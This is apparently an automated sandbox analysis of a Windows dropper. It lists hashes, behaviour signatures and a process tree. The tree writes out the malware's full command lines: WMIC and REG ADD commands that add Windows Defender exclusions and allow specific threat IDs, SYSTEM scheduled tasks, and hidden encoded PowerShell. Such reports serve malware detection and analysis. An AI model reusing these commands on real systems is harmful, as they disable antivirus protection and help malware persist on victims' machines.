Analysis
-
max time kernel
163s -
max time network
266s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
-
submitted
25-04-2024 02:41
General
-
Target
65122561ef77967e63d5f3f5cbe450ff891b3fb47a206e305e838c3b491f7585.exe
-
Size
6.4MB
-
MD5
48083f28a764d552c591874ec8255897
-
SHA1
6a6f73d45aa90f751c47ba886dda6c0f8c7a440a
-
SHA256
65122561ef77967e63d5f3f5cbe450ff891b3fb47a206e305e838c3b491f7585
-
SHA512
f62312f2ed7db1f98c04985135c75d46d86482f2a1c7e457cbe003b35c5d20065eb960fe9a7a0d535380c6cf4cef48ac0f4fbd46b449c4a470ee6e8ba88559ab
-
SSDEEP
98304:91Ofp2zjJY231tFaCYTlZE1JLFSNGw6eJm5JeHxFKw7/X26jOnCB9XmtPtX4S8Bl:91Oh2zjVpYD8vDwJmaHxbS2Os9qP0eEn
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Drops file in System32 directory 33 IoCs
-
Drops file in Program Files directory 14 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 49 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\65122561ef77967e63d5f3f5cbe450ff891b3fb47a206e305e838c3b491f7585.exe"C:\Users\Admin\AppData\Local\Temp\65122561ef77967e63d5f3f5cbe450ff891b3fb47a206e305e838c3b491f7585.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS5D33.tmp\Install.exe.\Install.exe /Bmdideu "525403" /S2⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bwrroZoeZRoQVpyAcj" /SC once /ST 02:42:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\IOxEHzi.exe\" ZO /TYsite_idgzE 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\IOxEHzi.exeC:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\EmHZJQvMUXyMfbh\IOxEHzi.exe ZO /TYsite_idgzE 525403 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJLDvKxDU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJLDvKxDU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDcnSjPvYahU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\jDcnSjPvYahU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qpZxqHvFKXpRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qpZxqHvFKXpRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vGrfpbVBjyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vGrfpbVBjyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mMAjWdbxOIjSziVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mMAjWdbxOIjSziVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\heXdjphsLYtTYYrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\heXdjphsLYtTYYrU\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJLDvKxDU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jDcnSjPvYahU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpZxqHvFKXpRC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vGrfpbVBjyUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mMAjWdbxOIjSziVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mMAjWdbxOIjSziVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AjftBdcqEhUoRKcxg /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\heXdjphsLYtTYYrU /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\heXdjphsLYtTYYrU /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gdHkQdJsM" /SC once /ST 00:38:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gdHkQdJsM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gdHkQdJsM"2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "qXnxKrbPbFSTFetyh" /SC once /ST 01:11:51 /RU "SYSTEM" /TR "\"C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\lMIgeTu.exe\" ob /lGsite_idcps 525403 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "qXnxKrbPbFSTFetyh"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\lMIgeTu.exeC:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\lMIgeTu.exe ob /lGsite_idcps 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwrroZoeZRoQVpyAcj"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
